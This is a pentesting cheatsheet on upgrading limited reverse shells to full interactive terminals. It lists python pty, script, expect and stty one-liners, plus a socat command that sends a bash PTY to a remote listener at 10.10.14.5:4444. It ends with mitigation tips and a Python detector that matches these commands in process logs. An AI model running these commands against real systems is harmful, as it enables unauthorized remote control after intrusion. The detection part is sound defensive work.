Shell Upgrade Tty

Shells & Payloads cheatsheet — Reverse shells, bind shells, and payload generation.

Overview

TTY shell upgrades turn limited reverse shells (typically from netcat or Python one-liners) into fully interactive terminals with job control, terminal echo, and proper line editing. This is essential for using interactive tools such as sudo, vim, or other text editors.

Multiple techniques exist for upgrading partial shells depending on available tools on the target system.

Key Commands & Payloads

The following commands are commonly used to upgrade a limited shell to a full TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'
script /dev/null -c bash
echo os.system('/bin/bash')
/usr/bin/expect -c 'spawn bash;interact'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.5:4444
rlwrap nc -lvnp 4444
stty raw -echo; fg    # after Ctrl+Z on listener
stty rows 40 cols 130
export TERM=xterm-256color
export SHELL=bash

Tools & Techniques

Recommended tools for upgrading a shell to a full TTY:

  • Python PTY: python3/2 -c 'import pty;pty.spawn("/bin/bash")'
  • Script: script /dev/null -c bash
  • Socat: full TTY with socat exec
  • rlwrap: readline wrapper for netcat
  • stty: terminal size configuration after raw mode

Prevention & Mitigation

Security recommendations to detect and limit TTY shell upgrades:

  • Monitor for TTY upgrade activity (spawned shells)
  • Restrict Python/script/socat execution where possible
  • Use application whitelisting to block unauthorized interpreters
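
A sketch of the first recommendation, monitoring for TTY upgrade activity, as an added example that is not part of the original cheatsheet: it matches process-execution events against the command forms listed under Key Commands & Payloads. The `parent<TAB>cmdline` event format, the `SERVICE_PARENTS` set, and the severity labels are assumptions, and the sample events are constructed.

```python
import os
import re
import shlex

SHELLS = {"sh", "bash", "dash", "zsh"}
# Assumption: parent process names treated as network-facing services.
SERVICE_PARENTS = {"nginx", "apache2", "httpd", "php-fpm", "java", "node"}

def classify(cmdline):
    """Return the name of the TTY-upgrade rule a command line matches, or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    if not argv:
        return None
    prog, args = os.path.basename(argv[0]), argv[1:]
    rest = " ".join(args)
    if re.fullmatch(r"python[23]?(\.\d+)?", prog) and re.search(r"\bpty\.spawn\s*\(", rest):
        return "python-pty"
    if prog == "script" and "/dev/null" in args and any(os.path.basename(a) in SHELLS for a in args):
        return "script-pty"
    if prog == "expect" and re.search(r"\bspawn\s+\S*sh\b.*\binteract\b", rest):
        return "expect-spawn"
    if prog == "socat" and re.search(r"\bexec:", rest, re.I) and re.search(r"\bpty\b", rest):
        return "socat-pty"
    return None

def scan(log_text):
    """Return (severity, rule, parent) for each matching 'parent<TAB>cmdline' line."""
    alerts = []
    for line in log_text.splitlines():
        parent, _, cmdline = line.partition("\t")
        rule = classify(cmdline)
        if rule:
            # A PTY allocated under a service process is rated higher than one under a login shell.
            severity = "high" if parent in SERVICE_PARENTS else "medium"
            alerts.append((severity, rule, parent))
    return alerts

# Constructed sample events (parent process name, TAB, command line).
SAMPLE_EVENTS = """\
php-fpm\tpython3 -c 'import pty;pty.spawn("/bin/bash")'
sshd\tscript /dev/null -c bash
bash\t/usr/bin/expect -c 'spawn bash;interact'
nginx\tsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.5:4444
cron\tpython3 /opt/app/manage.py migrate
bash\tscript /tmp/session.log
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(*alert)
```

Command-line matching covers only the forms listed on this page, so treat a hit as one signal alongside process-ancestry monitoring rather than a complete detection.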
